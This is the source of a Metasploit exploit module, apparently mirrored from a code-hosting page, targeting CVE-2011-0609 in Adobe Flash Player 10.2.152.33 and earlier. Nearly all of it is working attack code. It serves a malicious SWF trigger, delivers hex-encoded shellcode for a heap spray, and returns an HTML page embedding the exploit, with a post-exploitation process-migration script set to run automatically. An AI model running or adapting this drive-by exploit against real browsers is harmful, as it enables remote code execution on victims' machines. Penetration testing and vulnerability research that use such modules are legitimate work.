Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::HttpServer::HTML910def initialize(info = {})11super(update_info(info,12'Name' => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',13'Description' => %q{14This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.3315and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification16logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same17vulnerability that was used for the RSA attack in March 2011.1819Specifically, this issue results in uninitialized memory being referenced and later20executed. Taking advantage of this issue relies on heap spraying and controlling the21uninitialized memory.2223Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several24other browsers. DEP does catch the exploit and causes it to fail. Due to the nature25of the uninitialized memory its fairly difficult to get around this restriction.26},27'License' => MSF_LICENSE,28'Author' =>29[30'bannedit', # Metasploit version,31'Unknown' # Malcode version seen used in targeted attacks32],33'References' =>34[35['CVE', '2011-0609'],36['OSVDB', '71254'],37['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],38['URL', 'http://www.adobe.com/devnet/swf.html'],39['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],40['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],41],42'DefaultOptions' =>43{44'EXITFUNC' => 'process',45'HTTP::compression' => 'gzip',46'HTTP::chunked' => true,47'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'48},49'Payload' =>50{51'Space' => 1000,52'BadChars' => "\x00",53'DisableNops' => true54},55'Platform' => 'win',56'Targets' =>57[58[ 'Automatic', {}],59],60'DisclosureDate' => '2011-03-15',61'DefaultTarget' => 0))62end6364def exploit65path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-0609.swf" )66fd = File.open( path, "rb" )67@swf = fd.read(fd.stat.size)68fd.close6970super71end7273def on_request_uri(cli, request)74trigger = @swf75trigger_file = rand_text_alpha(rand(6)+3) + ".swf"76shellcode = payload.encoded.unpack('H*')[0]77obj_id = rand_text_alpha(rand(6)+3)7879if request.uri.match(/\.swf/i)80print_status("Sending Exploit SWF")81send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })82return83end8485# we use a nice trick by having Flash request our shellcode and load it for the heap spray86# src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as87if request.uri.match(/\.txt/i)88send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })89return90end9192html = <<-EOS93<html>94<head>95</head>96<body>97<center>98<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"99id="#{obj_id}" width="600" height="400"100codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">101<param name="movie" value="#{get_resource}#{trigger_file}" />102<embed src="#{get_resource}#{trigger_file}" quality="high"103width="320" height="300" name="#{obj_id}" align="middle"104allowNetworking="all"105type="application/x-shockwave-flash"106pluginspage="http://www.macromedia.com/go/getflashplayer">107</embed>108109</object>110</center>111112</body>113</html>114EOS115116print_status("Sending #{self.name} HTML")117send_response(cli, html, { 'Content-Type' => 'text/html' })118end119end120121122